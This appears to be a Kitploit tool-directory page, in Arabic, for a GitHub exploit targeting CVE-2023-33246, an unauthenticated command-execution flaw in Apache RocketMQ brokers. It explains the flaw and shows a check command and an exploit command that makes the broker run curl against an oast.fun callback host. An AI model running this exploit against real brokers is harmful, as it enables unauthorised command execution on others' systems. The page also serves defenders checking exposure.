Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-33246_RocketMQ_RCE_EXP — استغلال لثغرة CVE-2023-33246 تستهدف وسطاء Apache RocketMQ. ينفذ أوامر عشوائية عبر تحديث تهيئة غير مصادق عليه أو رسائل بروتوكول مزورة على الإصدارات الضعيفة 5.1.0 وما دونها. | Kitploit
أدوات/GitHubGitHub/mkjos/cve-2023-33246_rocketmq_rce_exp
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubmkjos/cve-2023-33246_rocketmq_rce_exp

CVE-2023-33246_RocketMQ_RCE_EXP

استغلال لثغرة CVE-2023-33246 تستهدف وسطاء Apache RocketMQ. ينفذ أوامر عشوائية عبر تحديث تهيئة غير مصادق عليه أو رسائل بروتوكول مزورة على الإصدارات الضعيفة 5.1.0 وما دونها.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

CVE-2023-33246_RocketMQ_RCE_EXP

CVE-2023-33246 استغلال تنفيذ الأوامر عن بُعد في RocketMQ

نظرة عامة

إصدارات RocketMQ 5.1.0 وما دونها معرضة لثغرة حقن الأكواد التعسفي. مكون Broker في RocketMQ مسرب على الشبكة الخارجية ويفتقد التحقق من الأذونات. يمكن للمهاجم استغلال هذه الثغرة باستخدام وظيفة تحديث التكوين لتنفيذ الأوامر كمستخدمي النظام الذي يعمل عليه RocketMQ. بالإضافة إلى ذلك، يمكن للمهاجم تحقيق نفس التأثير عن طريق تزوير محتوى بروتوكول RocketMQ.

كشف إصدار RocketMQ لتحديد الثغرات

أمثلة الاستخدام

فحص

root@kitploit:~
./RocketMQRceCheck -host 127.0.0.1 -port 9876

استغلال

root@kitploit:~
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test
تنزيل الأداة